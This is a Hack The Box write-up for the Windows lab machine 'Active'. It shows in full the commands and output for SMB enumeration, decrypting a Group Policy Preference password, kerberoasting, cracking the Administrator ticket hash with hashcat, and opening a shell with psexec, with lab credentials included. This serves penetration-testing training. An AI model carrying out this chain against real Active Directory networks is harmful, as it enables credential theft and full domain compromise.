Active - [HTB]
![Cover Image for Active - [HTB]](/assets/images/blog/Active-htb/Active.png)
Marmeus
Table of Contents
Introduction
Active is an easy windows machine from Hack The Box where the attacker will have to dig inside the available windows' shares in order to find a Group Policy Preference credential for a user account in the Active Directory. Finally, doing kerberoasting we are able to identify a service being run as Administrator where we can obtain its Administrator’s Kerberos 5 hash for a later password cracking, grating us an interactive shell.
Enumeration
As always, let's start finding all opened ports in the machine with nmap.
kali@kali:~/Documents/HTB/Active$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.100
Host is up (0.049s latency).
Not shown: 65491 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
268/tcp filtered td-replica
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
[...]
# Nmap done at Sun Jul 4 17:18:50 2021 -- 1 IP address (1 host up) scanned in 88.19 secondsThen, we continue with a deeper scan of every opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Active$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 21:48:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
[...]
Host script results:
|_clock-skew: 12m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T21:49:00
|_ start_date: 2021-07-04T17:54:09
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 4 17:36:31 2021 -- 1 IP address (1 host up) scanned in 70.35 secondsEnumerating the Windows shares with smbmap obtains that the share Replication is enumerable.
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5728355 blocks available
Looking inside there is a file Groups.xml at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\.
kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
10459647 blocks of size 4096. 5721526 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> Exploitation
This file contains the username active.htb\SVC_TGS and its encrypted password.
kali@kali:~/Documents/HTB/Active$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>In order to decrypt the password we need to execute the following command.
kali@kali:~/Documents/HTB/Active$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
Now, we have access to the Users share.
kali@kali:~/Documents/HTB/Active$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Inside it we can obtain the user flag in the directory \SVC_TGS\Desktop\.
kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Users -U "SVC_TGS%GPPstillStandingStrong2k18"
smb: \> cd SVC_TGS/Desktop/
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt
10459647 blocks of size 4096. 5721270 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Privilege Escalation
Because we have some domain credentials we can try kerberoasting using the tool GetUserSPNs.py
kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)However, we have an issue due to the time difference between our machine and the kerberos service. In order to fix this problem we only need to execute the following commands.
kali@kali:~/Documents/HTB/Active$ sudo apt install ntpdate -y
kali@kali:~/Documents/HTB/Active$ sudo ntpdate 10.10.10.100
5 Jul 08:09:15 ntpdate[10305]: step time server 10.10.10.100 offset +754.495116 secOnce fixed, we obtain the Administrator's TGS ticket in hashcat format.
kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
kali@kali:~/Documents/HTB/Active$ GetUserSPNs.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$493a9db3c8618a0037b2e1bec356a0c8$87170780c60ed56f8428e0eaa90f79d305c5505b73c267ef6d60ecc1cc1e4cb9090e54de1843b967fe2ffdd2af63d4bd242bb6c809619a075d0c9f2de13a21986de58a5658483e5a604380b7af28a49477bba09ee3beeda12d8b4cf918b1c572bf81b677fbc2ed778008c00be9002c5c54a3a63c2ba2c81d3c860e6ff75df598f3ae46bcf9de0604411681cdf3189e4f414b8db4aac60edb2d43e4ed5c0faecdef69968d24aba8a6b3f1f8c7a7433fba6ef93de064a0532b745c20571cde467c48bc5396e3dbe28ff2f2c34c9346a6061bc12dad9e7b08f2a21a2e1250cb433a938f264e797f0a2fb19ee18e476907819d5f96b581fe45ca575937abc24410986b63590655a63a4d9c05a8f019510b59e8593e3c170a24afa83d619ab2ae87f8bf2bbac689f8e3b86eb352089c865993a2d9f1720bcb2e2bf784ce542b699e3bcbce2a422db530fe642799ca32d5544c1e15dfd8d7b43a8b621337ce366bfaa07e3a9d3bbbe8f8ca42b8a5bcf9c124c84bcb93e5e7206d89e9ba612b6e97ed3d77c54bebb6687141a837020b8f13dc3046221be988634fb2e113d1e759a578302afbc6b9255ae84a8f8052b879964d085afaf51ee57e45b620b342e98bfa0826aa2beeb0292d13a9ae62d58828310e81f8b77c81ea188b4028c201fa32fb87ad5cfff79ec48bbaaa142226fc8f01c60ef77a142f80bc63f3bc56f25f52a86a5b55256d39faec49ea4b60a699b2867412977a775bb435f6fddddbd94326304a3e01f8cb9681d5003d7cb43ecdb802aa52d1a72889930f910ab0855ff5a5dffd1b7f1b0cff95a66dea713cfedf70e0ca8d821f8c8560542b03ef92e668cacb078920c2d018a026c9413de713e2e2cc3629227552443a8c97866df981f8d55c94b644f78311ad4584d668e73ef6dc053a62820bbe69233c0011e092cef4c3fec96809582f16a1de60ab1474f9eaca53f56feb22dec2ce4043009c085734c01f6696906a60b4d8400d77c2fc98eadbca23ffe5657b0ad4b8c2709cc5863ca11683f6d0275ddfc5c29278d4dfed4f3df1fa7e0b050c4acd8aad42f695cb23231d0c3b7ea65345fc4f069c8088ade81b1a3d3fec870d17b3741db2a7a6a96466eb4ddad7357b58d2a85bec43b244d9c6c8343dadd84c00b1423079f60a8413f31303d745313ec0abae0fb571933fc17b5addcef9f85d13dd933b4abda77c7e0fe8ee9219b8bf4f9161e0a0f41ad0a52f80dcf112dfca4d64cb07217971Using hashcat we can retrieve the Administrator's password.
kali@kali:~/Documents/HTB/Active$ hashcat -m 13100 -a 0 GetUserSPNs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
Host memory required for this attack: 134 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
[....]:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...217971
Time.Started.....: Mon Jul 5 08:12:39 2021 (14 secs)
Time.Estimated...: Mon Jul 5 08:12:53 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 753.3 kH/s (7.93ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE
Started: Mon Jul 5 08:12:22 2021
Stopped: Mon Jul 5 08:12:55 2021
Finally, in order to obtain a reverse shell as "Administrator" we need to execute psexec.
kali@kali:~/Documents/HTB/Active$ psexec.py "active.htb/administrator:Ticketmaster1968"@10.10.10.100
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ZxHDWdnx.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RlII on 10.10.10.100.....
[*] Starting service RlII.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
[CENSORED]